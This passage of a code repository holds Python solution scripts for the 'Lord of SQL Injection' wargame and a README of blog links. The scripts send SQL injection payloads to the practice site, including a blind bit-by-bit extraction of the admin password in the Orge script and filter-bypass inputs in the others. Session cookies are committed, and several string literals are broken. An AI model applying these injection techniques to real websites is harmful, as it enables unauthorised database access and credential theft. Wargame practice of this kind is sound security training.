36 | # find() > 0 skips a hit at offset 0. The literal below is broken across lines in this listing; confirm the marker against the original file.
37 | if r.text.find("WOLFMAN Clear!
") > 0:
38 | print "Wolfman Clear!"
39 |
40 |
--------------------------------------------------------------------------------
/6_DarkElf.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | # coding: utf-8
3 | # Lord of SQL Injection "DarkElf": send one crafted pw value and check the reply for the clear banner.
4 | import requests
5 | # The pw value below URL-decodes to: '||id='admin  (no closing quote and no comment marker).
6 | url = "http://los.eagle-jump.org/darkelf_6e50323a0bfccc2f3daf4df731651f75.php"
7 | param = "?pw=%27||id=%27admin"
8 |
9 | session = raw_input("Input your LOS session : ")
10 | # session = "gequo9hff2f19sjmieftjnuf50"
11 | # NOTE(review): the commented-out line above leaves a session ID in the repository; remove it and invalidate that session.
12 | headers = {
13 | 'Cookie': 'PHPSESSID={0}'.format(session)
14 | }
15 |
16 | # Send the request over plain http://, so the session cookie travels unencrypted.
17 | r = requests.get(url + param, headers=headers)
18 | # find() > 0 skips a hit at offset 0. The literal below is broken across lines in this listing; confirm the marker against the original file.
19 | if r.text.find("DARKELF Clear!
") > 0:
20 | print("DarkElf Clear!")
21 |
22 |
--------------------------------------------------------------------------------
/7_Orge.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | # coding: utf-8
3 | # Lord of SQL Injection "Orge": recover the admin pw bit by bit from a true/false ("Hello admin") response. Python 2 syntax.
4 | import requests
5 | from sys import stdout
6 |
7 | print("#### Lord of SQL Injection - Orge ####\n")
8 |
9 | url = "http://los.eagle-jump.org/orge_40d2b61f694f72448be9c97d1cea2480.php"
10 |
11 | session = raw_input("Input your LOS session : ")
12 | # session = "lqaa55h0s48l8h06rc9sguktt0"
13 | # NOTE(review): the commented-out line above leaves a session ID in the repository; remove it and invalidate that session.
14 | headers = {
15 | 'Cookie': 'PHPSESSID={0}'.format(session)
16 | }
17 |
18 | password = ""
19 | query = 0
20 |
21 | # The probes use || and %26%26 (&&) where the Orc script in this listing uses the words "or" and "and".
22 | # Guess the length of the password: try 0..99 until the response contains "Hello admin".
23 | for i in range(100):
24 | param = "?pw=' || id='admin' %26%26 length(pw)={0}%23".format(i)
25 | r = requests.get(url + param, headers=headers)
26 | query += 1
27 | # NOTE(review): if no value matches, `length` is never assigned and line 37 raises NameError.
28 | if r.text.find("Hello admin
") > 0:
29 | length = i
30 | print "[*] The length of 'pw' is {0}".format(i)
31 | break
32 |
33 |
34 | # Each character is read as bits: the query left-pads bin(ascii(char)) to 7 digits and tests one digit per request.
35 | # j runs 0..7 while lpad() yields 7 digits; position 0 presumably never matches and contributes a leading '0' - confirm.
36 | print("\n\n#### Starting Blind SQL Injection ####\n")
37 | for i in range(1, length + 1):
38 | binary = ''
39 | for j in range(0, 8):
40 | param = "?pw=' || id='admin' %26%26 (select substr(lpad(bin(ascii(substr(pw,{0},1))),7,0),{1},1)=1)%23".format(i, j)
41 | content = requests.get(url + param, headers=headers).text
42 | query += 1
43 |
44 | if content.find("Hello admin") > 0:
45 | binary += '1'
46 | else:
47 | binary += '0'
48 |
49 | password += chr(int(binary, 2))
50 |
51 | print chr(int(binary, 2)), "({0})".format(binary)
52 | stdout.flush()
53 |
54 | print "\n[*] the password : ", password
55 |
56 | # Submit the recovered value as pw and look for the clear banner (literal is broken across lines in this listing).
57 | url = "http://los.eagle-jump.org/orge_40d2b61f694f72448be9c97d1cea2480.php?pw=" + password
58 | r = requests.get(url, headers=headers)
59 |
60 | if r.text.find("ORGE Clear!
") > 0:
61 | print "[*] message : Orge Clear!"
62 |
63 | print "[*] total queries : {0}".format(query)
--------------------------------------------------------------------------------
/8_Troll.py:
--------------------------------------------------------------------------------
1 | # - *- coding : UTF-8 -*-
2 | from requests import get
3 | # Lord of SQL Injection "Troll": send id with mixed letter case ("admIn") and check the reply for the clear banner.
4 | # Set the URL. Presumably the server's check on "admin" is case-sensitive while the database comparison is not - confirm.
5 | url = "http://los.eagle-jump.org/troll_6d1f080fa30a07dbaf7342285ba0e158.php"
6 | param = "?id=admIn"
7 | new_url = url + param
8 |
9 | # Set the cookie. It must be your own session cookie.
10 | cookies = dict(PHPSESSID="5u71g5vp7547tv8ffl7osl0fl5")
11 | # NOTE(review): a session ID is committed here and sent over plain http://; treat it as exposed and read it at run time instead.
12 |
13 | # Send the HTTP request.
14 | r = get(new_url, cookies=cookies)
15 | # find() > 0 skips a hit at offset 0. The literal below is broken across lines in this listing; confirm the marker against the original file.
16 | if r.text.find("TROLL Clear!
") > 0:
17 | print("축하합니다! Troll을 클리어했습니다!")
18 |
19 |
--------------------------------------------------------------------------------
/9_Vampire.py:
--------------------------------------------------------------------------------
1 | # - *- coding : UTF-8 -*-
2 | from requests import get
3 | # Lord of SQL Injection "Vampire": send id as "admadminin" and check the reply for the clear banner.
4 | # Set the URL. Presumably the server removes "admin" in a single pass, which leaves "admin" behind - confirm.
5 | url = "http://los.eagle-jump.org/vampire_0538b0259b6680c1ca4631a388177ed4.php"
6 | param = "?id=admadminin"
7 | new_url = url + param
8 |
9 | # Set the cookie. It must be your own session cookie.
10 | cookies = dict(PHPSESSID="5u71g5vp7547tv8ffl7osl0fl5")
11 | # NOTE(review): a session ID is committed here and sent over plain http://; treat it as exposed and read it at run time instead.
12 |
13 | # Send the HTTP request.
14 | r = get(new_url, cookies=cookies)
15 | # find() > 0 skips a hit at offset 0. The literal below is broken across lines in this listing; confirm the marker against the original file.
16 | if r.text.find("VAMPIRE Clear!
") > 0:
17 | print("축하합니다! Vampire을 클리어했습니다!")
18 |
19 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Lord-of-SQL-Injection
2 | Lord of SQL Injection (주석은 한글로 작성되어 있습니다. / Comments were written in Korean!)
3 |
4 | 1. Gremlin : http://chaneyoon.tistory.com/51
5 | 2. Cobolt : http://chaneyoon.tistory.com/52
6 | 3. Goblin : http://chaneyoon.tistory.com/53
7 | 4. Orc : http://chaneyoon.tistory.com/54
8 | 5. Wolfman : http://chaneyoon.tistory.com/55
9 | 6. Darkelf : http://chaneyoon.tistory.com/56
10 | 7. Orge : http://chaneyoon.tistory.com/57
11 | 8. Troll : http://chaneyoon.tistory.com/58
12 | 9. Vampire : http://chaneyoon.tistory.com/59
13 | 10. Skeleton : http://chaneyoon.tistory.com/60
14 | 11. Golem : http://chaneyoon.tistory.com/61
15 | 12. Darknight : http://chaneyoon.tistory.com/62
16 | 13. Bugbear : http://chaneyoon.tistory.com/63
17 | 14. Giant : http://chaneyoon.tistory.com/64
18 | 15. Assassin : http://chaneyoon.tistory.com/65
19 | 16. Assassin_Zombie : http://chaneyoon.tistory.com/66
20 | 21. Iron_golem : http://chaneyoon.tistory.com/107
21 |
22 |
23 |
--------------------------------------------------------------------------------